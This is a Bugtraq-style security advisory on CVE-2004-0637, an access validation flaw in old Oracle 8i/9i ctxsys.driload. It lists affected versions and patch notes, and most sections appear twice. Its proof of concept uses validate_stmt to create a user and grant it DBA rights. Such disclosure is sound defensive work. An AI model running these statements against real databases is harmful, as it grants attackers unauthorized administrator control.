Oracle Database Server ctxsys.driload Access Validation Vulnerability
BID:11099
Info
Oracle Database Server ctxsys.driload Access Validation Vulnerability
| Bugtraq ID: | 11099 |
| Class: | Access Validation Error |
| CVE: |
CVE-2004-0637 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 03 2004 12:00AM |
| Updated: | Jul 12 2009 07:06AM |
| Credit: | Discovery is credited to Alexander Kornbrust. |
| Vulnerable: |
Oracle Oracle9i Standard Edition 9.0.1 .3 Oracle Oracle9i Standard Edition 9.0 .2.4 Oracle Oracle9i Personal Edition 9.0 .2.4 Oracle Oracle9i Enterprise Edition 9.0 .2.4 Oracle Oracle8i Standard Edition 8.1.7 .4 Oracle Oracle8i Enterprise Edition 8.1.7 .4.0 |
| Not Vulnerable: | |
Discussion
Oracle Database Server ctxsys.driload Access Validation Vulnerability
Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.
This issue corresponds to one of the unspecified vulnerabilities mentioned in BID 10871 and addressed by Oracle Alert #68.
Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.
This issue corresponds to one of the unspecified vulnerabilities mentioned in BID 10871 and addressed by Oracle Alert #68.
Exploit / POC
Oracle Database Server ctxsys.driload Access Validation Vulnerability
The following example was provided:
SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');
The following example was provided:
SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');
Solution / Fix
Oracle Database Server ctxsys.driload Access Validation Vulnerability
Solution:
Oracle has released an alert (#68) and a patch to address these issues. Information regarding obtaining and applying an appropriate patch can be found at the following location:
http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=281189.1
It should be noted that a valid subscription to the metalink service is required in order to view this document.
It is reported that software conflicts may arise when these patches are installed against binaries that have already had patches installed. Additionally, although Oracle 9i 9.2.x.x database server is supported, it is reported that customers may be required to update to versions 9.2.0.4/9.2.0.5 prior to applying these patches. This action might also be required for other releases and products. Customers are advised to contact the vendor for further information and support in regards to the installation of appropriate updates.
A message from "David Litchfield" <[email protected]> is available that states that some of the vulnerabilities in alert #68 may not have been successfully fixed by Oracle. Users of affected packages should refer to the referenced message, and contact their vendor for further information on the status of fixes.
A message from "NGSSoftware Insight Security Research" <[email protected]> (Oracle October 2005 CPU Problems) states that there is a flaw in the fix for the CTXSYS component of Oracle 8.1.7.4 on all platforms. Please see the referenced message for further details on this issue.
Solution:
Oracle has released an alert (#68) and a patch to address these issues. Information regarding obtaining and applying an appropriate patch can be found at the following location:
http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=281189.1
It should be noted that a valid subscription to the metalink service is required in order to view this document.
It is reported that software conflicts may arise when these patches are installed against binaries that have already had patches installed. Additionally, although Oracle 9i 9.2.x.x database server is supported, it is reported that customers may be required to update to versions 9.2.0.4/9.2.0.5 prior to applying these patches. This action might also be required for other releases and products. Customers are advised to contact the vendor for further information and support in regards to the installation of appropriate updates.
A message from "David Litchfield" <[email protected]> is available that states that some of the vulnerabilities in alert #68 may not have been successfully fixed by Oracle. Users of affected packages should refer to the referenced message, and contact their vendor for further information on the status of fixes.
A message from "NGSSoftware Insight Security Research" <[email protected]> (Oracle October 2005 CPU Problems) states that there is a flaw in the fix for the CTXSYS component of Oracle 8.1.7.4 on all platforms. Please see the referenced message for further details on this issue.
References
Oracle Database Server ctxsys.driload Access Validation Vulnerability
References:
References: